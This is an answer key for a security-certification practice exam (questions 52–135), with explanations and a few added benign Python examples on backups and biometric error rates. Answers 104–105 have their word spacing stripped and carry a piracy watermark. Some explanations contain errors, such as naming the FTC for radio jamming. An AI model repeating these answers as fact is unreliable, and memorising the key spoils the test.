52. B. The correct answer is to incorporate two-factor authentication with a mantrap. By having a smartcard at one door (type II authentication) and a PIN number (type I authentication) at the other door, Joanne will combine strong two-factor authentication with physical security. Smartcards by themselves, or paired with a fence, are still single-factor authentication. Video surveillance, though often a good idea, won't help with two-factor authentication.
53. A. Baselining is the process of establishing a standard for security. A change from the original baseline configuration is referred to as baseline deviation. Security evaluations or audits check security but don't establish security standards. Hardening is the process of securing a given system, but it does not establish security standards. Normalization is the process of removing redundant entries from a database.
54. A. Fake telemetry is telemetry created to make an attacker believe that a honeypot system is a legitimate system. Building a believable honeypot requires making the system as realistic as possible. Deepfakes are artificial intelligence (AI)-created videos that make it appear that individuals are saying or doing actions they never actually performed. The rest of the options were made up for this question.
55. A. RAID 1+0, or RAID 10, is a mirrored data set (RAID 1), which is then striped (RAID 0): a "stripe of mirrors." RAID 6 is disk striping with dual parity (distributed), RAID 0 is just striping, and RAID 1 is just mirroring.
56. D. Normalization is the process of removing duplication or redundant data from a database. There are typically four levels of normalization ranging from 1N at the lowest (i.e., the most duplication) to 4N at the highest (i.e., the least duplication). Although database integrity is important, that is not what is described in the question. Furthermore, integrity checking usually refers to checking the integrity of files. Deprovisioning is a virtualization term for removing a virtual system (server, workstation, etc.) and reclaiming those resources, and in the context of identity management means removing an account or permissions. Baselining involves setting security standards.
57. C. Remote Authentication Dial-in User Service (RADIUS) provides authentication, authorization, and accounting, which make up the three critical elements in AAA systems. OpenID is a protocol for authentication but does not provide authorization by itself. Lightweight Directory Access Protocol (LDAP) is a directory service, and Security Assertion Markup Language (SAML) is a markup language for making security assertions.
58. D. TLS inspection (often called SSL inspection because the term SSL remains widely, if incorrectly, in use) involves intercepting encrypted traffic between the client and server. TLS interception devices act as an on-path attack and decrypt traffic to scan and analyze it, often for malware or other signs of attacks, and then encrypt it to send it on to its destination. As you might expect, TLS inspection has both legitimate and malicious uses.
59. D. In most cases none of these options are practical. Destruction of drones is an illegal destruction of private property. Jamming the open frequencies used for drones is not permissible and may result in action by the Federal Trade Commission (FTC), and contacting the Federal Aviation Administration (FAA) to request that the airspace above a company be declared a no-fly zone is not something the FAA supports in most cases. This means that Diana is likely to have to deal with the potential for drone-based threats in other ways.
60. B. Isaac has built and configured a system where nonpersistence of systems can create forensic challenges. His organization needs to consider how they can make copies of compromised or problematic ephemeral systems and store them in a safe location for forensic analysis. This is not a forensic-resistant system—if he had a copy, he would have been able to analyze it. Live-boot media is not mentioned or used in this example, and terminate and stay resident (TSR) is a type of program run in the DOS operating system that returned control to the operating system but remained in memory so that it could be easily run again as needed.
61. D. Stored procedures are the best way to have standardized SQL. Rather than programmers writing their own SQL commands, they simply call the stored procedures that the database administrator creates. Formal code inspection might detect a lack of security practices and defenses but won't stop SQL-based attacks. Policies requiring stored procedures might help but are a less direct path to the solution. Finally, agile programming is a method for developing applications rapidly and won't determine how SQL commands are created.
62. C. Services integration in cloud and virtualization environments can be very complex and can involve data, APIs, and other types of application integration. Integration platforms allow organizations to use a standardized tool rather than building and maintaining their own. This allows them to focus on the actual integrations rather than the underlying system, saving time and effort. Since integration platforms also often have preexisting tools for common services and APIs, they can save significant amounts of time for organizations that adopt them. Of course, this also introduces another platform to assess and secure.
63. B. When virtualization reaches the point that IT can no longer effectively manage it, the condition is known as VM sprawl. VM overload and VM spread are made up for this question, and a VM zombie is a term for a virtual machine that is running and consuming resources but no longer has a purpose.
64. A. VM escape is a situation wherein an attacker is able to go through the VM to interact directly with the hypervisor and potentially the host operating system. The best way to prevent this is to limit the ability of the host and the VM to share resources. If possible, they should not share any resources. Patching might mitigate the situation, but it is not the most effective solution. Using firewalls and antimalware tools is a good security practice but would have minimal effect on mitigating VM escape.
65. A. Irene is looking for a software-as-a-service (SaaS) tool that allows her to perform the specific function that her organization needs to accomplish. An SaaS service does not require system administration or programming and typically requires minimal configuration to perform its normal functionality. Platform-as-a-service (PaaS) typically requires some configuration or programming, and infrastructure-as-a-service (IaaS) will require systems administration, programming, or configuration—or all three! Identity-as-a-service (IDaaS) is a specific type of solution that was not described as part of Irene's needs.
66. D. Serverless architectures do not require a system administrator because the provider manages the underlying function-as-a-service (FaaS) capability. It can also scale up or scale down as needed, allowing it to be very flexible. Serverless architectures are typically not ideal for complex applications and instead tend to work better for microservices.
67. A. The correct answer is to have a motion-activated camera that records everyone who enters the server room. Motion recognition is an important feature in this type of scenario, where cameras operate in a space where there is little physical traffic and storage would be wasted by recording empty, unused spaces. Smartcards, deadbolts, and logging won't detect theft.
68. C. A Domain Name System (DNS) sinkhole is a DNS server used to spoof DNS servers that would normally resolve an unwanted or malicious hostname. Traffic can be sent to a legitimate system, causing warnings to appear on the user's screen, or simply sent to a null route or nonexistent system. An intrusion detection system (IDS) cannot stop traffic, round-robin DNS is a way to spread DNS traffic, and a WAF is a web application firewall, and nothing in this question indicates that there is a web-specific issue.
69. C. Hot aisle/cold aisle is a layout design for server racks and other computing equipment in a data center. The goal of a hot aisle/cold aisle configuration is to conserve energy and lower cooling costs by managing airflow. An infrared camera will detect heat levels on the aisles. Although the rest of the options are potential issues for a data center, an infrared camera won't help with them.
70. D. A security guard is the most effective way to prevent unauthorized access to a building. Options A, B, and C are all incorrect. These are all good physical security measures, but they are not the most effective ways to prevent entry into a building.
71. B. Software-defined networking (SDN) makes the network very scalable. It is relatively easy to add on new resources or remove unneeded resources, and it helps with high availability efforts. SDN does not stop malware, detect intrusions, or prevent session hijacking.
72. A. The correct answer is to use an application container to isolate that application from the host operating system. Application containers provide a virtualized environment in which to run an application. Moving to software-defined networking (SDN) is a very involved process and does not provide an efficient solution. Running the application in a separate VLAN will not separate the application from the host operating system; it might not solve the problem. Since this is a legacy application, insisting on an updated version of the application isn't feasible.
73. D. Each of the options above is a potential risk when using third-party libraries or SDKs. Organizations need to understand and assess the risks of third-party code, but it is a common practice to use third-party libraries. Identifying trustworthy and reliable sources and managing the versions and updates are critical to using third-party components safely.
74. B. A cloud access security broker (CASB) is used to monitor cloud activity and usage and to enforce security policies on users of cloud services.
75. A. Microservice architectures build applications as a set of loosely coupled services that provide specific functions using lightweight protocols. It doesn't specifically define the size of the systems, but it is not a tightly coupled environment. Protocol choice is often open standards-based, but the emphasis is on lightweight protocols. There is not a requirement that services be in-house or third party exclusively.
76. C. The correct answer is to implement IaC. Infrastructure as code (IaC) is the process of managing and provisioning computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. Whether the data center(s) use physical machines or virtual machines, this is an effective way to manage the data centers. Although data center managers may be needed, that won't necessarily provide consistent management across the enterprise. Software-defined networking (SDN) will not fix this problem, but it would help if she needed to configure and manage her network based on usage and performance. Finally, this issue is not just about provisioning; it is about management.
77. D. OAuth is a common authorization service used for cloud services. It allows users to decide which websites or applications to entrust their information to without requiring them to give them the user's password. OpenID is frequently paired with OAuth as the authentication layer. Kerberos is more frequently used for on-site authentication, and SAML is Security Assertion Markup Language.
78. C. In this scenario Greg should identify the use of the printers for further attacks against the organization as the most critical risk. Use as part of a distributed denial-of-service (DDoS) attack does not directly impact the organization in most cases, exhausting supplies would be an annoyance, and the risk of scanning documents from a remote location requires sensitive documents to be left in the MFPs. Greg should note that all of these issues could be problems and move the MFPs to a protected network so that third parties can't access them.
79. D. The systems that Keith has deployed are thin clients, computers that do not run their applications and storage from their local drives and instead rely on a remote server. Cloud and virtualization implementations of this providing virtual desktops are called VDI, or Virtual Desktop Infrastructure, but do not necessarily require a thin client, since they can work on a fully capable computer (or thick client). Client-as-a-server is a made-up term.
80. B. This real-world example was found in 2020 when malicious PowerShell code was discovered that triple-encoded malicious tools. The initial package was downloaded as an image from imgur.com or similar sites and was concealed using steganographic techniques. The code was also encrypted using RSA and encoded in Base64 both prior to encryption and again after encryption. Although steganography is not incredibly common, Henry should suspect that a downloaded image may be more than it appears.
81. A. Storing data in plain text will not help prevent data exposure and, in fact, is more likely to result in data exposure. Instead, Molly should encourage her developers to store and transmit sensitive data in an encrypted form. They should also leverage HTTPS for all authenticated pages, and potentially all pages. Hashing passwords using salts is important for password security, and ensuring that tokens are not exposed via sites like GitHub or other public code repositories is important for application and data security.
82. C. Using secure firmware, as well as using an RTOS with time and space partitioning, are both common methods to help ensure RTOS security. Unlike traditional operating systems, real-time operating systems are used in applications where they need to deal with inputs immediately. That means that adding additional load like firewalls and antimalware is not a typical component in RTOS applications. For similar reasons, you're unlikely to find a web browser on most devices running an RTOS.
83. B. In a code reuse attack, the attacker executes code that is meant for some other purposes. In many cases this can be old code that is no longer even used (dead code), even if that code is in a third-party library. A buffer overflow occurs when too much data is sent to a buffer. For example, say a buffer is designed to hold 10 bytes, and it is sent 100 bytes, causing the additional data to be put into unexpected memory locations. A denial-of-service (DoS) attack is meant to make a service or system unavailable to legitimate users. Session hijacking involves taking over an existing authenticated session.
84. C. Zigbee is specifically designed for this type of usage. Narrowband radios are not typically in use for this type of purpose, and baseband radio requires very large antennas to use the low-frequency spectrum. Cellular options require a carrier and are not well suited to direct peer-to-peer configurations.
85. B. Homomorphic encryption can perform computations on the ciphertext without access to the private key that the ciphertext was encrypted with. When the computations are completed, the results are the same as if those computations had been performed against the original plaintext. Identity-preserving and replicable encryption were made up for this question.
86. A. Fingerprint reader systems are the most widely accepted biometric systems in common use for entry access and other purposes today. Facial recognition systems are increasingly in use and are also likely to be more accepted by user populations based on their broad deployment in phones, but they are not listed as an option. Both retina and iris scans are less likely to be accepted, whereas voice systems are both relatively uncommon and more disruptive for frequent usage.
87. C. Tape backups are the most common solution for cold backups off-site. Cloud backups to a cold repository are increasingly popular options and may be faster for some retrieval scenarios, but they are not listed as options. Storage area network (SAN) and network-attached storage (NAS) devices are not commonly used for cold backup and are instead used for online or nearline options. Disk backup could be used but remains less common than tape for a true cold backup scenario.
88. B. Off-site storage has to balance availability and the ability to be used in the event that a disaster or other event occurs. In this case, Allan should look at a facility far enough away that a single disaster cannot take both sites offline.
89. D. Embedded systems can bring a broad range of security implications, many of which are driven by the limited capabilities of the processors and hardware they are frequently built with. Low-power consumption designs may lack computational power and thus have challenges implementing strong cryptography, network connectivity, and other similar problems. Patching embedded systems can be challenging both because of where they are deployed and because of a lack of connectivity for them—in fact, in many environments, you may not want the devices to be connected to your network. Since many don't have a screen, keyboard, or a network connection, authentication is also a problem. Few embedded devices, however, need bulk storage, making the lack of bulk storage a problem that typically isn't a major concern.
90. B. System on a chip (SoC) devices are complete self-contained systems on a single chip. Therefore, having their own unique cryptographic keys is the best way to implement authentication and security. Option A is incorrect. A system on a chip is self-contained, so a Trusted Platform Module (TPM) would not be an appropriate solution. Option C is incorrect. A self-encrypting drive (SED) is not relevant to system on a chip, since that system does not have a "drive." Option D is incorrect. Many SoC technologies don't use a BIOS.
91. A. Such systems need to have all communications encrypted. As of the current date, breaches of portable network devices have all involved unencrypted communications. Option B is incorrect. Full-disk encryption (FDE) may or may not even be appropriate for such devices. Many don't have a disk to encrypt. Option C is incorrect. It may not be possible to install antimalware on many such devices. Option D is incorrect. Fuzz testing is used for applications.
92. D. The more vehicles utilize computers and have network communication capabilities, the more they will be vulnerable to cyberattacks. Options A, B, and C are all incorrect, as all of these are concerns rather than just one.
93. A. An advantage of compiling software is that you can perform static code analysis. That means Amanda can review the source code for flaws and could even remediate flaws if they were found. Both binaries and compiled code can be tested in a live environment (dynamic analysis), and checksums for both can be validated.
94. A. RFCs, or requests for comment, are how Internet protocols are defined and documented. Wikipedia is not the definitive resource, and the Internet Archive actively archives the Internet but does not define protocols.
95. C. Standard naming conventions typically do not help to conceal systems from attackers. Attackers can still scan for systems and may even be able to use the naming convention to identify the purpose of a system if the naming convention includes a purpose or technology in the name. Naming conventions do make standardization easier and can help administrators quickly identify what a machine does, while making it simpler to include systems in scripts. A machine that doesn't match is likely to be rogue or misconfigured.
96. B. This is an example of a continuous integration/continuous delivery (CI/CD) pipeline. There is no mention of monitoring systems, and although code analysis is happening here in testing, it is dynamic testing, not source code analysis. There is no mention of malware in the pipeline.
97. D. Although gait analysis is not commonly used for identification and authorization purposes, it is used in situations where crowd footage is available to identify individuals. Vein, voiceprint, and fingerprint analysis are not useful in most scenarios involving heavily used and crowded spaces.
98. C. A community cloud presents a compromise solution. Community clouds are semi-private. They are not accessible to the general public but only to a small community of specific entities. There are risks with public clouds, as there are with any environment. Private clouds can be quite expensive to build out, particularly for smaller organizations that cannot afford staffing or hardware. Finally, recommending against a cloud solution does not match the company's stated goal.
99. D. Using infrastructure as a service (IaaS) makes the most sense here; it meets the cloud requirement described and would allow additional systems to be quickly created or removed as needed. Platform as a service (PaaS) does not provide direct access to Linux systems to build out applications and related configuration. Setting up dual boot and building machines are not cloud solutions as described. When you answer questions like this, make sure you read and meet all the requirements in the question.
100. A. One of the dangers of automation and scripting is that the scripts will do exactly what they are written to do. That means that a script like those that Corrine has been asked to write that doesn't have rules that prevent it from blocking critical systems could block those systems. There is no indication in the question of any issues with private IP addresses, and filtering them would require more work. Attackers could potentially use the scripts if they discovered them, but if they're able to access security scripts there is likely a deeper problem. Finally, auditors typically do not review scripts and instead ask about the existence of controls.
101. D. Differential backups back up all of the changes since the last full backup. An incremental backup backs up all changes since the last incremental backup. A snapshot captures machine state and the full drive at a bitwise level, and full backups are a complete copy of a system but typically do not include the memory state.
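The difference between differential and incremental backups in answer 101, worked as an added example that is not from the book: a constructed four-day file history is backed up both ways, and the restore chains show why a differential restore needs only the full plus the newest differential while an incremental restore needs the full plus every incremental in order.

```python
from typing import Dict, List

# A file set maps file name -> content. The contents below are constructed
# toy values ("v1", "v2", ...) standing in for real file data.
FileSet = Dict[str, str]


def changed_since(current: FileSet, reference: FileSet) -> FileSet:
    """Files that are new or whose content differs from the reference state.

    Deletions are not tracked in this simplified model.
    """
    return {name: data for name, data in current.items() if reference.get(name) != data}


def differential_backup(current: FileSet, last_full: FileSet) -> FileSet:
    # Everything changed since the last FULL backup; grows from day to day.
    return changed_since(current, last_full)


def incremental_backup(current: FileSet, last_backup_state: FileSet) -> FileSet:
    # Everything changed since the PREVIOUS backup (the full on day 0, then
    # the prior incremental); stays small but lengthens the restore chain.
    return changed_since(current, last_backup_state)


def restore_differential(full: FileSet, latest_differential: FileSet) -> FileSet:
    # Restore needs exactly two pieces: the full plus the newest differential.
    restored = dict(full)
    restored.update(latest_differential)
    return restored


def restore_incremental(full: FileSet, incrementals: List[FileSet]) -> FileSet:
    # Restore needs the full plus EVERY incremental, applied in order;
    # a missing or out-of-order piece leaves files at a stale version.
    restored = dict(full)
    for inc in incrementals:
        restored.update(inc)
    return restored


# Constructed history: the live system's files at the end of each day.
DAILY_STATES: List[FileSet] = [
    {"config.ini": "v1", "db.sql": "v1", "log.txt": "v1"},  # day 0: full backup taken
    {"config.ini": "v2", "db.sql": "v1", "log.txt": "v1"},  # day 1: config edited
    {"config.ini": "v2", "db.sql": "v2", "log.txt": "v1"},  # day 2: database changed
    {"config.ini": "v3", "db.sql": "v2", "log.txt": "v1"},  # day 3: config edited again
]


def simulate(states: List[FileSet] = DAILY_STATES) -> dict:
    """Take a full backup on day 0, then both a differential and an incremental
    on each following day, and return what each backup would contain."""
    full = dict(states[0])
    differentials: List[FileSet] = []
    incrementals: List[FileSet] = []
    previous = full
    for state in states[1:]:
        differentials.append(differential_backup(state, full))
        incrementals.append(incremental_backup(state, previous))
        previous = state
    return {"full": full, "differentials": differentials, "incrementals": incrementals}


if __name__ == "__main__":
    sim = simulate()
    for day, (diff, inc) in enumerate(zip(sim["differentials"], sim["incrementals"]), start=1):
        print(f"day {day}: differential holds {sorted(diff)}, incremental holds {sorted(inc)}")
    print("differential restore matches:", restore_differential(sim["full"], sim["differentials"][-1]) == DAILY_STATES[-1])
    print("incremental restore matches:", restore_incremental(sim["full"], sim["incrementals"]) == DAILY_STATES[-1])
```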
102. C. The correct answer is a public cloud. Public clouds are usually less expensive. The cloud provider has a number of customers and costs are dispersed. Even individuals can afford to use cloud storage with services like iCloud and Amazon Cloud. A community cloud is usually private for a small group of partners. Each of the partners must share a greater part of the expense than they would with a public cloud, but they retain more control over the cloud than they would with a public cloud. Private clouds are often the most expensive for smaller organizations. The company must completely develop and maintain the cloud resources and cannot leverage shared resources. A hybrid deployment model is a good compromise for many situations, but it will typically be more expensive than a public cloud for a small organization.
103. C. The crossover error rate (CER) is the point where the FAR (false acceptance rate) and the FRR (false rejection rate) cross over. CER provides a means of comparing biometric systems based on their efficiency, with a lower CER being more desirable.
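How the CER in answer 103 is actually located, as an added example rather than anything from the book: FAR and FRR are computed from constructed match scores for two hypothetical readers at every threshold, the threshold where the two rates cross is found, and the reader with the lower CER is preferred.

```python
from typing import Dict, Sequence, Tuple


def error_rates(genuine: Sequence[int], impostor: Sequence[int], threshold: int) -> Tuple[float, float]:
    """FAR and FRR at one threshold.

    A sample is accepted when its match score is >= threshold, so raising
    the threshold lowers FAR (fewer impostors get in) and raises FRR (more
    genuine users are turned away). The two rates pull in opposite directions.
    """
    far = sum(1 for s in impostor if s >= threshold) / len(impostor)
    frr = sum(1 for s in genuine if s < threshold) / len(genuine)
    return far, frr


def crossover_error_rate(genuine: Sequence[int], impostor: Sequence[int],
                         thresholds: Sequence[int] = range(0, 101)) -> Dict[str, float]:
    """Sweep thresholds and return the point where FAR and FRR cross.

    The crossover is where the gap between the rates is smallest; the CER
    is the (shared) rate at that point. Ties go to the lowest threshold.
    """
    best = None
    for t in thresholds:
        far, frr = error_rates(genuine, impostor, t)
        gap = abs(far - frr)
        if best is None or gap < best["gap"]:
            best = {"threshold": t, "far": far, "frr": frr, "gap": gap, "cer": (far + frr) / 2}
    return best


# Constructed match scores (0-100) from two hypothetical readers: ten genuine
# attempts and ten impostor attempts were each scored against an enrolled template.
SYSTEM_A = {"genuine": [92, 88, 84, 80, 76, 72, 66, 60, 54, 48],
            "impostor": [8, 14, 20, 28, 34, 42, 50, 56, 62, 70]}
SYSTEM_B = {"genuine": [80, 76, 70, 66, 62, 58, 54, 50, 46, 40],
            "impostor": [20, 30, 36, 44, 50, 54, 58, 62, 66, 70]}


def preferred_system(systems: Dict[str, dict]) -> str:
    """Name of the system with the lowest CER (lower is better)."""
    return min(systems, key=lambda name: crossover_error_rate(**systems[name])["cer"])


if __name__ == "__main__":
    for name, scores in {"A": SYSTEM_A, "B": SYSTEM_B}.items():
        result = crossover_error_rate(**scores)
        print(f"system {name}: crossover at threshold {result['threshold']}, CER {result['cer']:.2f}")
    print("preferred:", preferred_system({"A": SYSTEM_A, "B": SYSTEM_B}))
```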
104. B. Elasticityisacloudcomputingconceptthatmatchesresourcestodemandtoensurethataninfrastructurecloselymatchestheneedsoftheenvironment.Scalabilityistheabilitytogroworshrinkasneededbutdoesnotdirectlyincludetheconceptofmatchingtoworkload.Normalizationisacodedevelopmentconceptusedtoensurethatdataisinaconsistentform.
105. A. Anuninterruptablepowersupply(UPS)shouldbeNathaniel’sfirstpriority.Ensuringthatpowerisnotdisruptedduringanoutageandcanbemaintainedforashortperioduntilalternatepowerlikeageneratorcan
Telegram Channel @nettrain
comeonlineiscritical,andaUPScanprovidethatcapability.Ageneratoralonewilltakelongertocomeonline,resultinginanoutage.Dualpowersuppliescanhelptobuildresiliencebyallowingmultiplepowersourcesandavoidingissuesifapowersupplydoesfail,butthatisnotthefocusofthequestion.Amanagedpowerdistributionunit(PDU)providesremotemanagementandpowermonitoringbutwillnotpreventpowerlossinanoutage.
106. B. Virtual machine (VM) sprawl refers to a situation in which the network has more virtual machines than the IT staff can effectively manage. The remaining options do not match the term VM sprawl.
107. C. Stored procedures are commonly used in many database management systems to contain SQL statements. The database administrator (DBA), or someone designated by the DBA, creates the various SQL statements that are needed in that business, and then programmers can simply call the stored procedures. Stored procedures are not related to dynamic link libraries (DLLs). Stored procedures can be called by other stored procedures that are also on the server. Finally, stored procedures are not related to middleware.
108. D. Bollards are large barriers that are often made of strong substances like concrete. They are effective in preventing a vehicle from being driven into a building. None of the other answers match the purpose of a bollard.
109. D. Selah should be concerned about cloning the badges because magnetic stripe badges are relatively simple to clone in most cases. Tailgating is common, particularly if there are large numbers of employees, since employees are unlikely to allow doors to close and then reopen them for every person who enters during shift changes. Since magnetic stripe readers do not require any additional information, use by unauthorized individuals is easy if a badge is lost or stolen.
110. A. Virtual machine (VM) escape attacks rely on a flaw in the hypervisor that could allow an attacker to attack the hypervisor itself. Typical system administration best practices can help, including regular patching of the hypervisor, but in the event of a successful escape attack, limiting damage by keeping VMs of the same sensitivity level isolated to the same host can prevent broader impact. Antivirus is always a good idea and may even stop some malware-based VM escape attacks, but isolating the VM is more effective. Full-disk encryption (FDE) will have no effect since the disk must be decrypted during operation. A Trusted Platform Module (TPM) is used for storing cryptographic keys.
111. C. Managed security service providers (MSSPs) are outside companies that handle security tasks. Some or even all security tasks can be outsourced, including intrusion detection and prevention (IDS/IPS) management, security information and event management (SIEM) integration, and other security controls. Software-defined networking (SDN) would make managing security somewhat easier but would itself be difficult to implement. Automating as much security activity as is practical would help alleviate the problem but would not be as effective as security as a service. Finally, only implementing a few security controls would likely leave control gaps.
112. B. Cryptographic hashes are used for integrity checking of files, network packets, and a variety of other applications. Storing a cryptographic hash of the application and comparing the application on the network to that hash will confirm (or refute) whether the application has been altered in any way. Network intrusion detection or network intrusion prevention systems (NIDSs/NIPSs) are useful, but they won't prevent an application from being altered. Sandboxing is used to isolate an application, but it won't detect whether it has been tampered with.
113. C. Separating the SCADA (Supervisory Control and Data Acquisition) system from the main network makes it less likely that the SCADA system can be affected from the main network. This includes malware as well as human action. Software-defined networking (SDN) would make isolating the SCADA system easier but would not actually isolate it. Patch management is always important, but in this case, it would not have prevented the issue. Encrypted data transmissions, such as TLS, would have no effect on this situation.
114. B. Gordon should implement a version numbering scheme and ensure that the proper current version of software components is included in new releases and deployments. Developers could still manually reintroduce old code, but version numbering helps to ensure that you have a current version in use. Neither continuous deployment nor continuous integration will prevent old code from being inserted, and release management may rely on version numbering but won't prevent it by itself.
115. D. Transport Layer Security (TLS) provides a reliable method of encrypting web traffic. It supports mutual authentication and is considered secure. Although Secure Sockets Layer (SSL) can encrypt web traffic, every version of SSL is now deprecated; TLS was created in 1999 as its successor. Although many network administrators still use the term SSL, in most cases today what you are using is actually TLS, not the outdated SSL. PPTP and IPSec are protocols for establishing a VPN, not for encrypting web traffic.
116. A. Smart cards can support modern cryptographic algorithms, meaning that weak security due to a smart card's limitations on encryption is not a common issue. Smart card readers and maintenance do add additional expense, and user experiences are limited by the need to have the card in hand and insert it or present it to a reader either during authentication or for entire sessions. Smart cards typically have a PIN or password, meaning that they are used for multifactor, not single-factor, authentication.
117. D. Setting off an alarm so that staff become used to it being a false positive is a technique that penetration testers may use if they can gain access to a facility. Once staff are used to alarms going off and ignore them, the penetration testers can enter areas that are alarmed without a response occurring. Setting off the alarm as part of a test isn't typical for penetration testers, and disabling the alarm and waiting for the lack of an alarm to be reported is also more likely to be part of an internal test, not a penetration test. Asking staff members to open the door is not a means of making alarms less effective, and staff members who know the door is alarmed are unlikely to do so.
118. C. The term "XaaS" refers to anything as a service, a broad reference to the huge number of options that exist for services via third-party providers. The rest of the options for this question were made up for the question.
119. D. Signage plays multiple roles in secure environments, including discouraging unwanted or unauthorized access, providing safety warnings, and helping with evacuation routes and other navigation information as part of a physical safety effort.
120. B. Nora has established a cold site. A cold site is a location that can be brought online but does not have systems; cold sites typically have access to power and bandwidth, but they need to be fully equipped to operate after a disaster since they are just rented space. Warm sites have some or all of the infrastructure and systems Nora needs but do not have data. A hot site is a fully functional environment with all of the hardware, software, and data needed to operate an organization. They are expensive to maintain and run but are used by organizations that cannot take the risk of downtime. An MOU is a memorandum of understanding and is not a type of disaster recovery site.
121. A. Windows calls the point that it saves to return to a known good configuration a system restore point. Matt should set one prior to installing new software or patching if he is worried about what might occur. The rest of the options are not Windows terms.
122. A. TOTP, or time-based one-time password, algorithms rely on the time being accurate between both of the authentication hosts. That means that if a system or device is not properly synced to an authoritative and correct time server, or if its local system time has drifted, the authentication may fail. Although TOTP systems have some flexibility, a clock that is sufficiently incorrect will cause an issue. HMAC-based one-time password (HOTP) and short message service (SMS)-based multifactor systems do not suffer from this issue, and MMAC was made up for this question.
123. C. Object detection capabilities can detect specific types or classes of objects and can be used to determine if the object is moved. In this case, Nina could enable object detection to notify her when packages are delivered, and she may be able to specifically select an object to monitor for additional security. Infrared capabilities are useful in low-light situations, motion detection helps to preserve storage space by only recording when motion occurs, and facial recognition could help identify specific individuals but won't help with packages.
124. C. Although user health data is a concern for the wearer of the device, unless the device is required by the organization, the user's health data is typically not an organizational security concern. GPS location data, data exposure from data that is copied to or accessible from the device, and the potential for devices to act as unsecured wireless gateways to the organization's network are all common security concerns for wearables. Lack of patching, lack of device encryption, and the inability to enforce compliance or security policies are also common concerns for wearables.
125. D. A Faraday cage is an enclosure of conductive material, often a metal wire mesh, designed to block electromagnetic fields and interference (EMI). None of the other answers describe what a Faraday cage is used for or capable of.
126. B. Smart cards paired with electronic locks can be used to allow entrance into a building. The smart card system can also store information about the user, and thus the system can log who enters the building. A security guard with a sign-in sheet would function, but there are many ways to subvert a sign-in sheet, and a guard can be distracted or become inattentive. This makes smart card access a better solution. Guards are also more expensive over time. A camera would record who enters but would not control access, so a nonemployee could enter the building. An uncontrolled or unsupervised sign-in sheet would not be secure.
127. D. Although electronic locks offer a number of advantages, including the ability to provide different codes or access to different users and the ability to deprovision access, they also require power, whether in the form of a battery or constantly provided power from a power source. That means that power loss can cause issues, either due to the lock remaining locked (fail-secure) or defaulting to an open state (fail-safe); which behavior is wanted depends on whether life safety or asset protection matters more for that door.
128. A. Managing her organization's IP address schema and usage will allow Kara to identify unknown and potentially rogue devices. IP addresses are not used to secure encryption keys, and managing a schema will not help prevent denial-of-service attacks. Keeping track of what IP addresses are in use can help avoid IP address exhaustion, but this does not provide a direct security advantage.
129. C. Of the locks listed here, deadbolts are the most secure. The locking bolt goes into the door frame, making it more secure. Whether a lock uses a key or combination does not change how secure it is. Key-in-knob locks are very common and generally provide less resistance to bypass than a deadbolt-based solution. Finally, padlocks can be cut off with common bolt cutters.
130. B. NIC teaming can provide greater throughput by sending traffic through multiple network interface cards (NICs) while also ensuring that loss of a card will not cause an outage, thus providing fault tolerance.
131. A. False acceptance rate (FAR) is the rate at which the system incorrectly allows in someone it should not. This is clearly a significant concern. Any error is a concern, but the false rejection rate is less troublesome than the false acceptance rate. The crossover error rate (CER) is the point at which the FAR and the false rejection rate (FRR) become equal; it is not an error in itself but the operating point used to compare the overall accuracy of biometric systems. The equal error rate is another name for crossover error rate.
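Questions 103 and 131 both turn on how FAR, FRR and the CER relate, so here is one added example (not from the book) that computes all three from a constructed set of match scores. Sweeping the acceptance threshold shows the trade-off: a strict threshold drives FAR to zero at the cost of rejecting genuine users, and the CER is the threshold where the two rates meet. The score lists are made up for the demonstration.

```python
# Constructed match scores (not from the original page): higher means the
# presented sample looks more like the enrolled user. Ten genuine attempts
# and ten impostor attempts.
GENUINE = [0.92, 0.88, 0.85, 0.81, 0.79, 0.76, 0.73, 0.70, 0.66, 0.60]
IMPOSTOR = [0.71, 0.64, 0.62, 0.58, 0.55, 0.50, 0.47, 0.43, 0.38, 0.30]


def far(threshold, impostor=IMPOSTOR):
    """False acceptance rate: share of impostor attempts whose score clears the threshold."""
    return sum(score >= threshold for score in impostor) / len(impostor)


def frr(threshold, genuine=GENUINE):
    """False rejection rate: share of genuine attempts whose score falls below the threshold."""
    return sum(score < threshold for score in genuine) / len(genuine)


def crossover(genuine=GENUINE, impostor=IMPOSTOR):
    """Try every observed score as a threshold; return (threshold, CER) where
    FAR and FRR are closest. With real data you would interpolate, but the
    idea is the same."""
    candidates = sorted(set(genuine + impostor))
    best = min(candidates,
               key=lambda t: (abs(far(t, impostor) - frr(t, genuine)), t))
    return best, (far(best, impostor) + frr(best, genuine)) / 2


def operating_points(thresholds=(0.5, 0.66, 0.8), genuine=GENUINE, impostor=IMPOSTOR):
    """FAR and FRR at a few thresholds: tightening the threshold trades FAR for FRR."""
    return {t: (far(t, impostor), frr(t, genuine)) for t in thresholds}


if __name__ == "__main__":
    for t, (fa, fr) in operating_points().items():
        print(f"threshold {t:.2f}: FAR={fa:.1f} FRR={fr:.1f}")
    t, cer = crossover()
    print(f"crossover at {t:.2f}, CER={cer:.1f}")
```

For a door to a server room you would deliberately run above the CER (lower FAR, higher FRR), which is exactly why question 131 treats FAR as the more serious error.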
132. C. Data sovereignty refers to the concept that data that is collected and stored in a country is subject to that country's laws. This can be a complex issue with multinational cloud services and providers that may store data in multiple countries as part of their normal architecture. It may also create compliance and other challenges based on differences in national laws regarding data, data privacy, and similar issues.
133. A. Low-power devices typically have limited processor speed, memory, and storage, meaning that encryption can be a challenge. Fortunately, solutions exist that implement low-power cryptographic processing capabilities, and continued advances in processor design continue to make lower-power processors faster and more efficient. Legal limitations do not typically take into account whether a device is a low-power device, and public key encryption can be implemented on a wide range of CPUs and embedded systems, so the large-number arithmetic that public key algorithms rely on is unlikely to be the blocking issue.
134. A. A secure cabinet or safe is tamper-resistant and provides a good place to store anything you are trying to physically protect. Encrypting thumb drives would require you to store the key used to encrypt the thumb drive, thus continuing the problem. It is actually a good practice to store BitLocker keys on removable media, provided that media is safeguarded. In most cases, desk drawers are not secure and can easily be broken into, even if they are locked.
135. D. RAID 6, disk striping with dual parity, uses a minimum of four disks with distributed parity bits. RAID 6 can handle up to two disks failing. RAID 3 is byte-level striping with dedicated parity and cannot tolerate more than a single drive failing. RAID 0 is disk striping, which cannot handle disk failure, and RAID 5, disk striping with distributed parity, can handle only one disk failing.
